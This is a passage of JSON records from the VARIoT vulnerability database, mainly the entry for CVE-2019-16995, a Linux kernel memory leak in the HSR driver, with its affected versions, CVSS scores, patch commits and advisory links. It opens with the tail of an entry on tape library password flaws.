        "date": "2017-12-29T02:29:12.957000",
        "db": "NVD",
        "id": "CVE-2012-1179"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "52533"
      },
      {
        "db": "PACKETSTORM",
        "id": "113818"
      },
      {
        "db": "PACKETSTORM",
        "id": "112355"
      },
      {
        "db": "PACKETSTORM",
        "id": "112364"
      },
      {
        "db": "PACKETSTORM",
        "id": "114208"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Quantum Scalar i500, Dell ML6000 and IBM TS3310 tape libraries web interface and preconfigured password vulnerabilities",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#913483"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201203-376"
      }
    ],
    "trust": 0.6
  }
}

var-201909-0977
Vulnerability from variot

In the Linux kernel before 5.0.3, a memory leak exits in hsr_dev_finalize() in net/hsr/hsr_device.c if hsr_add_port fails to add a port, which may cause denial of service, aka CID-6caabe7f197d. Linux Kernel Is vulnerable to a lack of free resources after a valid lifetime. Vendors have confirmed this vulnerability CID-6caabe7f197d It is released as.Service operation interruption (DoS) There is a possibility of being put into a state

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201909-0977",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "5.0.3"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "aff a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.107"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.0"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.164"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.30"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20.17"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.177"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.18.137"
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.1"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-16995"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.18.137",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.177",
                "versionStartIncluding": "4.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.164",
                "versionStartIncluding": "4.9",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.107",
                "versionStartIncluding": "4.14",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.30",
                "versionStartIncluding": "4.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.20.17",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.0.3",
                "versionStartIncluding": "5.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:5.1:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-16995"
      }
    ]
  },
  "cve": "CVE-2019-16995",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-16995",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-16995",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-16995",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201909-1341",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-16995"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "In the Linux kernel before 5.0.3, a memory leak exits in hsr_dev_finalize() in net/hsr/hsr_device.c if hsr_add_port fails to add a port, which may cause denial of service, aka CID-6caabe7f197d. Linux Kernel Is vulnerable to a lack of free resources after a valid lifetime. Vendors have confirmed this vulnerability CID-6caabe7f197d It is released as.Service operation interruption (DoS) There is a possibility of being put into a state",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-16995"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-16995",
        "trust": 2.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145",
        "trust": 0.8
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0141",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4676",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4252",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4584",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-1341",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-16995"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ]
  },
  "id": "VAR-201909-0977",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.25113124
  },
  "last_update_date": "2023-12-18T11:43:29.591000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-5.0.3",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.0.3"
      },
      {
        "title": "net: hsr: fix memory leak in hsr_dev_finalize()",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/6caabe7f197d3466d238f70915d65301f1716626"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "net: hsr: fix memory leak in hsr_dev_finalize()",
        "trust": 0.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6caabe7f197d3466d238f70915d65301f1716626"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=98730"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-401",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-772",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-16995"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00010.html"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00035.html"
      },
      {
        "trust": 1.6,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.0.3"
      },
      {
        "trust": 1.6,
        "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6caabe7f197d3466d238f70915d65301f1716626"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/6caabe7f197d3466d238f70915d65301f1716626"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16995"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16995"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193294-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193295-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193200-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2020/suse-su-20200093-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0141/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4676/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-memory-leak-via-hsr-dev-finalize-30486"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4584/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-16995"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-16995"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "date": "2019-09-30T13:15:11.073000",
        "db": "NVD",
        "id": "CVE-2019-16995"
      },
      {
        "date": "2019-09-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      },
      {
        "date": "2021-07-21T11:39:23.747000",
        "db": "NVD",
        "id": "CVE-2019-16995"
      },
      {
        "date": "2021-08-12T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
